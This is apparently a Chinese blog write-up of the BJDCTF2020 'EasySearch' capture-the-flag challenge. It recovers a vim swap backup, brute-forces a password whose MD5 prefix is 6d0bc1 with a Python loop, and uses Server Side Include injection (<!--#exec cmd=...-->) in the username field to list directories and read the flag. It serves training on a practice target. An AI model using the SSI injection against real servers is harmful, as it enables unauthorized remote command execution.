BUU-WEB-[BJDCTF2020]EasySearch

[BJDCTF2020]EasySearch


扫描找到主页的备份源码。

index.php.swp

在这里插入图片描述
1.passwd的md5前6位是6d0bc1
2. 成功提交后生成一个shtml文件。(SSI远程命令执行)
爆破一下,看看有哪些md5的前六位符合。

import hashlib

a = "0123456789"
for o in a:
    for p in a:
        for q in a:
            for r in a:
                for s in a:
                    for t in a:
                        for u in a:
                            b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
                            if((md5[0:6])=='6d0bc1'):
                                print(b)

在这里插入图片描述
爆破出密码后就可以登录了,username随意没有要求,只有密码有要求。
在这里插入图片描述

上传成功后,发现创建了一个.shtml的文件,转到文件下。
在这里插入图片描述
利用SSI注入漏洞,我们可以在username变量中传入SSI语句来远程执行系统命令。

#SSI命令格式
<!--#exec cmd="命令"-->

尝试ls一下。
在这里插入图片描述
在这里插入图片描述
没找打flag文件,再ls一下上级目录。
在这里插入图片描述
在这里插入图片描述
找到目标文件,尝试使用cat打开。
在这里插入图片描述
在这里插入图片描述
成功获取flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值